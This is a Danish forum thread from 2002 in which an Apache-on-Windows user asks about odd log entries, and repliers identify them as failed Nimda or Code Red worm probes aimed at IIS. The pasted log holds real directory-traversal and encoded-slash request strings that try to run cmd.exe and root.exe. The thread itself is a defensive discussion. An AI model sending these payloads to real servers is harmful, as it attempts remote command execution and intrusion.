01. april 2002 - 04:54
Der er
18 kommentarer og 1 løsning
Kig i min log :)
Hejsa Jeg kører en Apache webserver på min win2k, og jeg undrer mig over denne del af loggen, dukker op sommetider: 131.164.204.170 - - [01/Apr/2002:04:48:21 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - 131.164.204.170 - - [01/Apr/2002:04:48:28 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - 131.164.204.170 - - [01/Apr/2002:04:48:34 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 131.164.204.170 - - [01/Apr/2002:04:48:40 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 131.164.204.170 - - [01/Apr/2002:04:48:46 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 131.164.204.170 - - [01/Apr/2002:04:48:52 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 131.164.204.170 - - [01/Apr/2002:04:48:58 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 131.164.204.170 - - [01/Apr/2002:04:49:05 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 131.164.204.170 - - [01/Apr/2002:04:49:11 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 301 131.164.204.170 - - [01/Apr/2002:04:49:18 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 131.164.204.170 - - [01/Apr/2002:04:49:25 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - Er det noget jeg skal bekymre mig om? Og jeg er i det hele taget lidt bange for, om der er mange sikkerhedshuller i serveren...
Annonceindlæg tema
Offentlig digitalisering
Fra effektivisering til digital suverænitet. Hvordan skaber det offentlige en digital fremtid med AI, sikkerhed og kontrol i centrum?
01. april 2002 - 05:03
#1
Ligner noget nimda eller codered angreb, men tror ikke det har nogle effekt på apache. Virker vist kun på serverer som kører IIS. (Men er sku ikke helt sikker)
01. april 2002 - 05:04
#2
Det er jo heller ikke lykkedes for ormen at få adgang: fejlkode http 404
01. april 2002 - 05:05
#3
...tror lige jeg scanner for virus :)
01. april 2002 - 05:07
#4
nok en god ide'. Check også lige at når du kører din webside, at der ikke står "hacked by chinese" eller noget i den retning.
01. april 2002 - 05:10
#5
:D det gør jeg så...hehe
01. april 2002 - 05:15
#6
01. april 2002 - 05:19
#7
Ok... jeg tror ik der er sket noget, men hvordan sker det egentlig?
01. april 2002 - 05:20
#8
...at de får mulighed får at "smadre" en server på den måde?
01. april 2002 - 05:23
#9
Ormen kommer fra en anden pc/server som er inficeret, og ligger bare og venter indtil den kan komme i kontakt med en anden pc/server. Ejerene af de inficered servere er slet ikke klar over de har denne orm.
01. april 2002 - 05:25
#10
Og jeg er sikret, fordi jeg bruger Apache?
01. april 2002 - 05:26
#11
Ja du er sikret mod nimda og codered når du kører apache (du må ikke hænge mig op på det, men det mener jeg).
01. april 2002 - 05:27
#12
F,eks er man ved IIS servere nødt til at hente div. sikkerhedspathes for at serveren afviser disse angreb. Men som jeg umiddelbart kan se afviser din apache server ormen med fejlkode http 404, så den slet ikke får adgang.
01. april 2002 - 05:53
#13
Ok :) Ingen vira hos mig... Giver du et svar?
01. april 2002 - 05:56
#15
upz her er svaret *LOL*
01. april 2002 - 06:05
#16
hmmm mærkeligt, spørgmålet står stadigvæk som åbent ude i "spørgmål oversigt", selv om du har accepteret.
01. april 2002 - 06:06
#17
næææ, ok nu forsvandt det! Er vist ved at være træt!
01. april 2002 - 06:08
#18
Jeg sad også og undrede mig et øjeblik :) ku godt være man skulle til køjs :D
01. april 2002 - 06:10
#19
Har først fri kl 0700, så skal jeg også knalde brikker ;o)
Uanset kodesprog, så giver vi dig mulighederne for at udvikle det, du behøver.